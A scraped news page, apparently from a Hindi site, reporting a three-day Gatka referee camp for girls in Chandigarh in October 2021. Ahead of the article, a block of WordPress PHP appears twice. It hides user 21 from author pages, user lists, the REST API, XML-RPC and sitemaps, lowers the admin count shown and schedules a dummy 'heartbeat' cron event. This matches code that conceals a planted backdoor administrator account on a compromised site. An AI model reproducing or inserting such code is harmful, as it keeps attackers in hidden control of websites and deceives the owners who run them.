add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
लड़कियाँ गतका रैफ़री के तौर पर रजिस्ट्रेशन 15 सितम्बर तक करें - गरेवाल - Press Ki Taquat
No Result
View All Result
चंडीगढ़, 23 अगस्त (शिव नारायण जांगड़ा) : देश की सबसे पुरानी रजिस्टर्ड गतका खेल संस्था, ‘‘नेशनल गतका एसोसिएशन ऑफ इंडिया’’ के नेतृत्व अधीन गतका एसोसिएशन पंजाब (रजि.) और इंटरनेशनल सिख मार्शल आर्ट अकैडमी (रजि.) द्वारा गुरुद्वारा बाबे के, सैक्टर–53, चण्डीगढ़ में विशेष रूप से लड़कियों के लिए तीन दिवसीय गतका सैमीनार–कम–रैफऱी कैंप 01 अक्टूबर से 03 अक्टूबर, 2021 तक लगाया जा रहा है। जिसके लिए 20 साल से अधिक उम्र की इच्छुक गतकेबाज लड़कियाँ या महिला अध्यापक 15 सितम्बर तक आनलाइन रजिस्ट्रेशन कर सकतीं हैं।
यह जानकारी देते हुए नेशनल गतका एसोसिएशन के प्रधान स. हरजीत सिंह ग्रेवाल स्टेट ऐवार्डी ने बताया कि गतकेबाज लड़कियों के सामर्थ्य निर्माण और समानता के मौके प्रदान करने के लिए यह दूसरा रैफ़री कैंप लगाया जा रहा है जिससे भविष्य में होने वाले सभी टूर्नामेंटों में लड़कियाँ भी रैफ़री की भूमिका निभा सकें। उन्होंने बताया कि इस कैंप के दौरान सुबह जल्दी और शाम को ग्राउंड में एसोसिएशन की नयी रूल बुक के मुताबिक गतके का प्रैक्टिकल प्रशिक्षण दिया जायेगा जबकि दिन के समय थ्यूरी क्लासों के अदौरान माहिरों द्वारा विशेष लैक्चर दिए जाएंगे।
उन्होंने बताया कि इस राज्य स्तरीय कैंप में भाग लेने वाली जिन लड़कियों को रैफ़री के तौर पर चुना जायेगा, उनको स्मार्ट शिनाख्ती कार्ड दिए जाएंगे। इसके इलावा समूह कैपरों को टी–शर्टें, 500 रुपए किराया भत्ता और सर्टीफिकेट भी प्रदान किये जाएंगे।
गतका प्रमोटर ग्रेवाल ने कहा कि समूह कैंपर लड़कियों के लिए सुखद और सुरक्षित माहौल में रिहायश और खाना मुफ़्त मिलेगा। गतका कैंप के लिए रजिस्ट्रेशन फीस 100 रुपए है और 20 साल से अधिक उम्र की इच्छुक गतकेबाज लड़कियाँ या महिला अध्यापकों को 15 सितम्बर तक वैबसाईट www.Gatkaa.com/registration-of-players पर इस लिंक के द्वारा आनलाइन रजिस्ट्रेशन करनी लाज़िमी है।
नेशनल गतका एसोसिएशन के प्रधान ने हर तरह के शैक्षिक अदारों के मुखियों से अपील की है कि वह गतका खेल की प्रफुल्लता, खिलाड़ियों की बेहतरी और उनके उज्जवल भविष्य को देखते हुये अपने अदारे की गतका खेलने वाली लड़कियों /महिला अध्यापकाओं को उक्त गतका सैमीनार–कम–रैफ़री कैंप में भाग लेने के लिए यह सूचना ज़रूर भिजवा दें।
Post Views: 194
No Result
View All Result